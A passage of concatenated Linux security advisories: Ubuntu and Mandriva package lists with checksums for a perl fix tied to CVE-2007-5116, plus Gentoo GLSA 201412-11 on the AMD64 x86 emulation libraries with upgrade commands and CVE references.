http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_amd64.deb\n      Size/MD5:  2639400 2532bbf9f7ec861e7722d5cc1bef9836\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_i386.deb\n      Size/MD5:   559856 9ca996d88c16acb2a19eb6f80e3a68f4\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_i386.deb\n      Size/MD5:   505890 501159b17800e56a2824b06aca598460\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_i386.deb\n      Size/MD5:   737866 d3ca5af34f45f36979e644cb5e94cbb9\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_i386.deb\n      Size/MD5:    28974 c4eade3cf3be3b813bcbd7af7841b146\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_i386.deb\n      Size/MD5:  3296740 7e67c35913fd8046a75434e401130497\n    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_i386.deb\n      Size/MD5:  2404442 0138415fc08635142fb0985f30997655\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_powerpc.deb\n      Size/MD5:   656338 6201cd747c040ba44701ed056c9760c0\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_powerpc.deb\n      Size/MD5:     1014 fecb67e1721ab983e3fb1a69eb610672\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_powerpc.deb\n      Size/MD5:   815514 2799cd895e4681ed7f194039368e1dae\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_powerpc.deb\n      Size/MD5:    32042 808c4cdcc9db259a87224bbe75394c96\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_powerpc.deb\n      Size/MD5:  3656072 73cdf23c1e5fbda52f4936bb6d52fc9a\n    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_powerpc.deb\n      Size/MD5:  2594308 f6585376f877b9838bb62bd09002de49\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_sparc.deb\n      Size/MD5:   599300 d4011b7ac37b77c53901f676a623cd0f\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_sparc.deb\n      Size/MD5:     1008 caf72f034baf309d4a9269d45148325d\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_sparc.deb\n      Size/MD5:   790400 23a9e4c89ad2fe168ccc2391a89e463d\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_sparc.deb\n      Size/MD5:    30114 a53a3f41de69344ec741d46220e3ad7e\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_sparc.deb\n      Size/MD5:  3581290 7be78922d29146a99fb5a3f7dec3790e\n    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_sparc.deb\n      Size/MD5:  2485596 02c9351609686d699573508e64fa2db0\n\nUpdated packages for Ubuntu 6.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.diff.gz\n      Size/MD5:    88034 e7b46f9bc884e567164e379ab26e9650\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.dsc\n      Size/MD5:      749 910ebb281f9ea452ae0857c8314d1cfd\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz\n      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-6ubuntu0.1_all.deb\n      Size/MD5:  7352010 b99926050f3b94b3e48860f70f740aa3\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-6ubuntu0.1_all.deb\n      Size/MD5:  2309166 9d0fd2d1e39918d3dc0b1aab4c94fef1\n    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-6ubuntu0.1_all.deb\n      Size/MD5:    40398 22b82469393909ff8696fb66c5cd3a53\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_amd64.deb\n      Size/MD5:   633844 d731f8b5c5e72a8f901b8e5f1ff9c969\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_amd64.deb\n      Size/MD5:     1060 3f823954c678b8ec7cdbfa162769c5a2\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_amd64.deb\n      Size/MD5:   809976 4b9d37a405a280fecd1f66de779bb3ff\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_amd64.deb\n      Size/MD5:  2740032 0f8417f96f652753f1ba80248cf00b22\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_amd64.deb\n      Size/MD5:    33032 2f89afbc96c250918bc1ca19d91e1adb\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_amd64.deb\n      Size/MD5:  4047288 5732ea8ac056e8b84eae8aacff85e39f\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_i386.deb\n      Size/MD5:   576166 39f1f4597d70b448edabcf55ae025d31\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_i386.deb\n      Size/MD5:   521498 35f0badd87f6ea95677671a923c0bd9b\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_i386.deb\n      Size/MD5:   751416 fec47b71b9705f139a119e758522650c\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_i386.deb\n      Size/MD5:  2507638 631968cae57f3b647ee7a2cbf6c1c326\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_i386.deb\n      Size/MD5:    31446 697584fbffbdb407f414688b5e65de2e\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_i386.deb\n      Size/MD5:  3375590 d60160cc0c6f0f02d7001c2b5b6c0eda\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_powerpc.deb\n      Size/MD5:   655630 54ed7f131777c37840a07d45449abbed\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_powerpc.deb\n      Size/MD5:     1058 c7d4ed077dc5f47813cf9651832c4139\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_powerpc.deb\n      Size/MD5:   811264 dbfa0db2d5addbef8999a7ca635f76c9\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_powerpc.deb\n      Size/MD5:  2704838 d58cadf730c133612a2b715a6d1ba76b\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_powerpc.deb\n      Size/MD5:    33034 cb872bf5e3e82f2fadd68531744fce74\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_powerpc.deb\n      Size/MD5:  3734780 89ad67a21fad9c6ad706ef4528ab244b\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_sparc.deb\n      Size/MD5:   596308 ba0fd9953be95186e73fc0182e8bc638\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_sparc.deb\n      Size/MD5:     1058 249e2f0416e9dda9b89b200fc0307abf\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_sparc.deb\n      Size/MD5:   785358 57c0b81325a4178a03c5459f3764892c\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_sparc.deb\n      Size/MD5:  2580646 a6bc6816614b1498813f73c64f6fcee5\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_sparc.deb\n      Size/MD5:    31238 30dac6d5bc7e52ca86bf31b63d2b4bdc\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_sparc.deb\n      Size/MD5:  3675336 12fa93853d4b4aec097c5bf94280fdb5\n\nUpdated packages for Ubuntu 7.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.diff.gz\n      Size/MD5:    93072 d7601147dea2f84164094cb5f465468f\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.dsc\n      Size/MD5:      833 dc5eec23d30c9c2949d7f8db63853b1e\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz\n      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu0.1_all.deb\n      Size/MD5:  7352222 e55e069d2f8000557b7b5b2aa0a1adcb\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu0.1_all.deb\n      Size/MD5:  2309560 dd6bed420c639b12e8d87e1e1c17761f\n    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu0.1_all.deb\n      Size/MD5:    40926 c175bc89fb6e7ab0a09b42a256dffc92\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_amd64.deb\n      Size/MD5:   633990 6f659d15fd70053cadabb6eb4a62af97\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_amd64.deb\n      Size/MD5:     1054 9bce50cfb434976acdf5fde560b20488\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_amd64.deb\n      Size/MD5:   825078 097d8f4a1122478d3757e806ce87aa52\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_amd64.deb\n      Size/MD5:  2751476 6f3d9b0d94b648240948c67cda43f5ea\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_amd64.deb\n      Size/MD5:    33584 d9a3ef3ef1fe338c5d8d4b8becd90e54\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_amd64.deb\n      Size/MD5:  4053672 6d4e46bffe916b65f60ad22646ffe04f\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_i386.deb\n      Size/MD5:   575736 4e8b9308d46c94245aa425d5d748310b\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_i386.deb\n      Size/MD5:   533092 0e51d08b389b40e4de7ba387d1e84ec6\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_i386.deb\n      Size/MD5:   764366 95193d01ace6a4e14a1def19b3f30545\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_i386.deb\n      Size/MD5:  2519080 f2d8e651e6a675a98f86f65646ce39e1\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_i386.deb\n      Size/MD5:    31944 8c6a5688d5f2aff2af6a3720f493a171\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_i386.deb\n      Size/MD5:  3387948 69d6eaa7c204c6fe7f64b654cf152894\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_powerpc.deb\n      Size/MD5:   655158 5353abcd2b8cc6984e62af1560c23553\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_powerpc.deb\n      Size/MD5:     1058 f4de2f8f93bc1b1b2b254165c145ee3b\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_powerpc.deb\n      Size/MD5:   854058 a17efcd900e80cee096b1ad7d01b0f46\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_powerpc.deb\n      Size/MD5:  2721466 1412c01799559dd3d78e82c74a916996\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_powerpc.deb\n      Size/MD5:    37020 96638207a58488a7be3b5736020fa9fe\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_powerpc.deb\n      Size/MD5:  3769700 da74c33814b0565f4f073b00cecea400\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_sparc.deb\n      Size/MD5:   596338 0cd6d0e9704cd7ee3b3dd9e33f9d3396\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_sparc.deb\n      Size/MD5:     1058 84c48fa4edef5274c8d9d4c55fe3b52a\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_sparc.deb\n      Size/MD5:   798438 69eb63699dea95c17df557ccd44564ca\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_sparc.deb\n      Size/MD5:  2592862 98850ef36922fa444fd0502afba43bd7\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_sparc.deb\n      Size/MD5:    33070 d22c4f74172c4adba2697abf5c73c68e\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_sparc.deb\n      Size/MD5:  3682418 60c99f0e4ccc43f85c79938a96ee0455\n\nUpdated packages for Ubuntu 7.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.diff.gz\n      Size/MD5:    93377 1e4ec9cfc65220001f38e66bc4f56f9e\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.dsc\n      Size/MD5:      833 4f3fbac268e294b885eae342164b3689\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz\n      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu3.1_all.deb\n      Size/MD5:  7352108 e5eb23ee5b3aa0cdc9695a16d6806dce\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu3.1_all.deb\n      Size/MD5:  2309548 a3e19bb488e5abdd25bb6dbfcfc41f01\n    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu3.1_all.deb\n      Size/MD5:    41112 015a3cd3f858159ca6e8f59d9f24a4ea\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_amd64.deb\n      Size/MD5:   636102 f074f93f1d6f20b5b4fd3a87681fcc6d\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_amd64.deb\n      Size/MD5:     1058 a08f769b54183fa2e1ad5209df65b4fa\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_amd64.deb\n      Size/MD5:   826274 dded240edee784d66b32d15a42e21420\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_amd64.deb\n      Size/MD5:  2758908 030cca99de6221176f6f1b30b2730761\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_amd64.deb\n      Size/MD5:    33638 0fb9c0f1f5a4ec9be1a8fa5b153f3a31\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_amd64.deb\n      Size/MD5:  4054576 ed997ee6c2d500d6edc6cbc0044ce6be\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_i386.deb\n      Size/MD5:   576402 9a43f0153732f1c9da78dd888a679e08\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_i386.deb\n      Size/MD5:   533380 1bb3c67a2d586ef3eaefb41be94ab729\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_i386.deb\n      Size/MD5:   765194 3e7418191776393366a27650158850f8\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_i386.deb\n      Size/MD5:  2522478 f8720540f22cf8cf7f09b3456b327cae\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_i386.deb\n      Size/MD5:    31910 f109f1280eb2d49cd1c1ce6a0ca1f0be\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_i386.deb\n      Size/MD5:  3386812 7d0627fd447f7304f09cf1f97fd9a60d\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_powerpc.deb\n      Size/MD5:   655908 8938912ff5b287ecf0cc03346c34bbb1\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_powerpc.deb\n      Size/MD5:     1064 798ce70342c8d3604f23f5752866ea81\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_powerpc.deb\n      Size/MD5:   854220 c486169333316db7439e1095b1cce637\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_powerpc.deb\n      Size/MD5:  2724854 bdcd88d30efe2b485b35250c5c3ee797\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_powerpc.deb\n      Size/MD5:    37026 a83324fe5b2179fd06f06bd68d349f25\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_powerpc.deb\n      Size/MD5:  3768652 1a31197fa79647a63ea3ae553353a857\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_sparc.deb\n      Size/MD5:   596948 2d898e93ec93bec4f77d7d88601fab96\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_sparc.deb\n      Size/MD5:     1060 3d3ecf3c4b079230a7232667d86df061\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_sparc.deb\n      Size/MD5:   799330 db0cf8569787563788f4b4299f3a24c3\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_sparc.deb\n      Size/MD5:  2594250 4d26ef4c14fa16e0cd5b94a75596590d\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_sparc.deb\n      Size/MD5:    33122 264999f3199971dc1cf0aca911c3b1ea\n    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_sparc.deb\n      Size/MD5:  3684732 497152ef28c663d150b4d1d564a1b068\n\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201412-11\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities\n     Date: December 12, 2014\n     Bugs: #196865, #335508, #483632, #508322\n       ID: 201412-11\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in AMD64 x86 emulation base\nlibraries, the worst of which may allow remote execution of arbitrary\ncode. \n\nBackground\n==========\n\nAMD64 x86 emulation base libraries provides pre-compiled 32-bit\nlibraries. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-emulation/emul-linux-x86-baselibs\n                               \u003c 20140406-r1           \u003e= 20140406-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in AMD64 x86 emulation\nbase libraries. Please review the CVE identifiers referenced below for\ndetails. \n\nImpact\n======\n\nA context-dependent attacker may be able to execute arbitrary code,\ncause a Denial of Service condition, or obtain sensitive information. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll users of the AMD64 x86 emulation base libraries should upgrade to\nthe latest version:\n\n  # emerge --sync\n  # emerge -1av \"\u003e=app-emulation/emul-linux-x86-baselibs-20140406-r1\"\n\nNOTE: One or more of the issues described in this advisory have been\nfixed in previous updates. They are included in this advisory for the\nsake of completeness. It is likely that your system is already no\nlonger affected by them. \n\nReferences\n==========\n\n[  1 ] CVE-2007-0720\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720\n[  2 ] CVE-2007-1536\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536\n[  3 ] CVE-2007-2026\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026\n[  4 ] CVE-2007-2445\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445\n[  5 ] CVE-2007-2741\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741\n[  6 ] CVE-2007-3108\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108\n[  7 ] CVE-2007-4995\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995\n[  8 ] CVE-2007-5116\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116\n[  9 ] CVE-2007-5135\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135\n[ 10 ] CVE-2007-5266\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266\n[ 11 ] CVE-2007-5268\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268\n[ 12 ] CVE-2007-5269\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269\n[ 13 ] CVE-2007-5849\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849\n[ 14 ] CVE-2010-1205\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205\n[ 15 ] CVE-2013-0338\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338\n[ 16 ] CVE-2013-0339\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339\n[ 17 ] CVE-2013-1664\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664\n[ 18 ] CVE-2013-1969\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969\n[ 19 ] CVE-2013-2877\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877\n[ 20 ] CVE-2014-0160\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-11.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n \n Updated packages have been patched to prevent these issues. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2007.0:\n 7dee97092269465ccb5de0f35321ab13  2007.0/i586/perl-5.8.8-7.1mdv2007.0.i586.rpm\n efd626e1f1efd248e6c6570e88a599c3  2007.0/i586/perl-base-5.8.8-7.1mdv2007.0.i586.rpm\n 62b10d28a5abc05d3b8cd35c7f68e8aa  2007.0/i586/perl-devel-5.8.8-7.1mdv2007.0.i586.rpm\n 3a9dc19143ab6a27713fdeb6665d8d76  2007.0/i586/perl-doc-5.8.8-7.1mdv2007.0.i586.rpm\n 60b511580ae4f514434dd111efa42872  2007.0/i586/perl-suid-5.8.8-7.1mdv2007.0.i586.rpm \n 08e44392992b4ab983bf85debb8be462  2007.0/SRPMS/perl-5.8.8-7.1mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n be33f079454aec3b88f21716dfacf8d6  2007.0/x86_64/perl-5.8.8-7.1mdv2007.0.x86_64.rpm\n 5a82850218434119c3f55047b3068213  2007.0/x86_64/perl-base-5.8.8-7.1mdv2007.0.x86_64.rpm\n 4f995ed4fa46f2bf79a427d9341e895b  2007.0/x86_64/perl-devel-5.8.8-7.1mdv2007.0.x86_64.rpm\n e949a7e20661c6c5f4c4511f25196ff6  2007.0/x86_64/perl-doc-5.8.8-7.1mdv2007.0.x86_64.rpm\n a3df44cc0b957b02bfcab3eed98542dd  2007.0/x86_64/perl-suid-5.8.8-7.1mdv2007.0.x86_64.rpm \n 08e44392992b4ab983bf85debb8be462  2007.0/SRPMS/perl-5.8.8-7.1mdv2007.0.src.rpm\n\n Mandriva Linux 2007.1:\n efb800025ab3001b90af0e16e5a49886  2007.1/i586/perl-5.8.8-10.1mdv2007.1.i586.rpm\n 515beec177dd5a0418090016ae357274  2007.1/i586/perl-base-5.8.8-10.1mdv2007.1.i586.rpm\n ae79195a6f27e44fd4ff7899497cf948  2007.1/i586/perl-devel-5.8.8-10.1mdv2007.1.i586.rpm\n f721306e820d4c66db3466917cde67f9  2007.1/i586/perl-doc-5.8.8-10.1mdv2007.1.i586.rpm\n 85a219e5b2c3788841024be8d81b2cac  2007.1/i586/perl-suid-5.8.8-10.1mdv2007.1.i586.rpm \n 9b22a92ec4a3dc898a12bbb80ada4de2  2007.1/SRPMS/perl-5.8.8-10.1mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n 1a17302f843293a5dc0063fe3e4549c0  2007.1/x86_64/perl-5.8.8-10.1mdv2007.1.x86_64.rpm\n c85ba481d517ec81c54eea5bc7064405  2007.1/x86_64/perl-base-5.8.8-10.1mdv2007.1.x86_64.rpm\n 5d3b84a1444339a83058bc3493506d22  2007.1/x86_64/perl-devel-5.8.8-10.1mdv2007.1.x86_64.rpm\n 005d395a8717bd5af248820eb01cc1d8  2007.1/x86_64/perl-doc-5.8.8-10.1mdv2007.1.x86_64.rpm\n f6c966ea032f921f033934d1f894b96b  2007.1/x86_64/perl-suid-5.8.8-10.1mdv2007.1.x86_64.rpm \n 9b22a92ec4a3dc898a12bbb80ada4de2  2007.1/SRPMS/perl-5.8.8-10.1mdv2007.1.src.rpm\n\n Mandriva Linux 2008.0:\n 6e84010549818c839e91034391b79f4f  2008.0/i586/perl-5.8.8-12.1mdv2008.0.i586.rpm\n f09541f2caf348aee64161cecdf7276e  2008.0/i586/perl-base-5.8.8-12.1mdv2008.0.i586.rpm\n dce7ae7aba1d356fd366075b67478493  2008.0/i586/perl-devel-5.8.8-12.1mdv2008.0.i586.rpm\n b3169afea74fd707021d03410172b6c0  